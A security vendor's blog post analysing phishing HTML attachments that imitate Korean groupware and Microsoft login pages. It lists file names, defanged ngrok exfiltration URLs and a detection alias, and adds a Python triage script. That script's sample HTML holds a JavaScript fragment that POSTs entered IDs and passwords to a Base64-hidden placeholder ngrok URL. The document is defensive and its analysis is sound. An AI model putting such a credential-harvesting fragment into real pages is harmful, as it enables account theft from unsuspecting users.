The ASEC analysis team introduced ‘phishing websites targeting Korean email service users’ in May of last year through a TI analysis report and an ASEC blog post. At the time, the team showed how the attackers leaked user credentials by targeting users of NAVER WORKS, MAILPLUG, hiworks, Chollian, and Daum.
Files disguised as a company groupware login page in order to steal user account credentials are one of the common phishing types being distributed, with slight variations in the email subject, body, attached file name, script code, etc.
The current attackers likewise disguise their files as groupware products that Korean users commonly use, but this time they use a simpler method: renaming the same script file to fit each recipient. The team also found multiple files impersonating NAVER WORKS, hiworks, Microsoft Outlook, and Microsoft SharePoint that use similar script code formats.
The table below shows the names of the files found so far and the dates they were discovered. Most of the file names include company names and take various forms such as requests for quotation, purchase orders, contracts, and order forms. Two of the files are notable in that the company name in each was changed at least 5 times before distribution. Some of the files have been uploaded to VirusTotal, but since no other vendor detected them at all, users could easily mistake them for normal files.
For instance, files with the same hash have been distributed under different names, such as ‘** Science_positive request form.htm,’ ‘** Ecotech.htm,’ and ‘** Factory (Inc.) request for quotation.htm’. There have also been cases of script files with different hashes but similar formats being distributed under the same file name. The malicious part of the script is discussed in more detail later in this post.
| File Name | Date | File Name | Date |
|---|---|---|---|
| PO2648357.htm (uses an abbreviated form of Purchase Order, P.O) | December 20th, 2021; December 22nd, 2021 | ** Ecotech.htm | January 26th, 2022 |
| ** Factory (Inc.) request for quotation.htm | December 24th, 2021 | authenticationsharepointazon.htm | January 11th, 2022 |
| ** Technology (Inc.) (order list.htm | December 28th, 2021 | (Inc.) ** Tech (inquiry for quotation).htm | December 20th, 2021; December 27th, 2021; January 19th, 2022; January 20th, 2022 |
| ** Industry (Inc.) contract.htm | January 4th, 2022 | ** Science_positive request form.htm | December 17th, 2021; January 23rd, 2022 |
| ** Industry. (order form).htm | January 19th, 2022 | (Inc.) ** request for quotation (20210608).htm | January 14th, 2022; January 25th, 2022; January 26th, 2022 |
| DOC Q0017 3509.html | January 24th, 2022 | **** Technology (Inc.)(order form).htm | December 29th, 2021; January 4th, 2022; January 6th, 2022 |
When you open the HTML file attached to the phishing mail, you will find a login page impersonating one of various groupware products, as shown below. Because it is difficult to distinguish the fake page from the real one, users should take extreme caution.
Comparing the script code of the phishing file with that of the normal NAVER WORKS login page in a text editor shows that the script code shown above has been appended at the bottom.
In the part that uses the JavaScript atob method, the variable d is declared with the Base64-encoded URL used to steal account credentials. When users enter their ID and password, the code sends that data to the decoded URL through an HTTP POST request. Then, in the part that uses window.location.replace, the attacker redirects users to one of the legitimate groupware pages listed below so that they do not realize they have just visited a phishing website.
- https://worksmobile.com
- https://outlook.live.com/owa/
- https://mail.naver.com
- https://mail.office.hiworks.com/
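As an added triage example (not code from the ASEC post), the script below applies the description above to an HTML attachment: it decodes Base64 literals passed to atob, checks whether the decoded value is a URL that receives a POST, and checks whether the page then redirects to one of the legitimate groupware sites listed above. The sample HTML, the ngrok subdomain and the path are constructed placeholders, not indicators from the post.

```python
import base64
import re
from urllib.parse import urlparse

# Legitimate sites the post says the script redirects victims to after the POST.
GROUPWARE_HOSTS = {"worksmobile.com", "outlook.live.com", "mail.naver.com", "mail.office.hiworks.com"}
ATOB_RE = re.compile(r"atob\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")
REDIRECT_RE = re.compile(r"location\.replace\(\s*[\"']([^\"']+)[\"']")
POST_RE = re.compile(r"\.open\(\s*[\"']POST[\"']")

def decode_atob_urls(html):
    """Return every Base64 literal passed to atob() that decodes to an http(s) URL."""
    urls = []
    for literal in ATOB_RE.findall(html):
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64 text, so not a hidden URL
        if urlparse(text).scheme in ("http", "https"):
            urls.append(text)
    return urls

def triage(html):
    """Flag the post's pattern: POST to a Base64-hidden URL, then redirect to a real site."""
    exfil = decode_atob_urls(html)
    redirects = REDIRECT_RE.findall(html)
    exfil_hosts = {urlparse(u).hostname or "" for u in exfil}
    redirect_hosts = {urlparse(u).hostname or "" for u in redirects}
    findings = {
        "exfil_urls": exfil,
        "redirects": redirects,
        "posts_to_hidden_url": bool(exfil) and bool(POST_RE.search(html)),
        "ngrok_exfil": any(h.endswith(".ngrok.io") for h in exfil_hosts),
        "redirects_to_groupware": bool(redirect_hosts & GROUPWARE_HOSTS),
    }
    findings["suspicious"] = findings["posts_to_hidden_url"] and findings["redirects_to_groupware"]
    return findings

# Constructed sample mimicking the fragment the post describes. The ngrok subdomain
# and path are placeholders made up for this example, not indicators from the post.
_EXFIL = "https://0000-0-0-0-0.ngrok.io/placeholder/collect.php"
SAMPLE_HTML = """<script>
var d = atob("%s");
function f(id, pw) {
  var x = new XMLHttpRequest(); x.open("POST", d, true);
  x.send("id=" + id + "&pw=" + pw);
  window.location.replace("https://mail.naver.com");
}
</script>""" % base64.b64encode(_EXFIL.encode()).decode()
```

Run `triage(open(path).read())` over quarantined .htm attachments; a hit on both `posts_to_hidden_url` and `redirects_to_groupware` is the combination the post describes.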
The attacker used a different URL for leaking account credentials for each impersonated service, as shown below, most likely in order to tell which web page the acquired account credentials were entered on. In fact, there have been multiple reports of ngrok.io platform domains being used for phishing since last year.
- hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_naver.php
- hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_hiworks.php
- hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/wendiflaisher_worksmobile.php
Because legitimate groupware images are used, users may be confused, but they should still refrain from entering account credentials on web pages opened from email attachments. If you receive a suspicious email and use the groupware mentioned in it, log in from the official groupware website through your web browser instead.
You should also keep the anti-malware you use updated to its latest version.
AhnLab’s anti-malware product, V3, detects and blocks the malicious script files introduced in this post using the alias below.
[File Detection]
Phishing/HTML.Generic.S1713
[IOC]
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post Phishing Script Files Being Distributed by Impersonating Various Groupware appeared first on ASEC BLOG.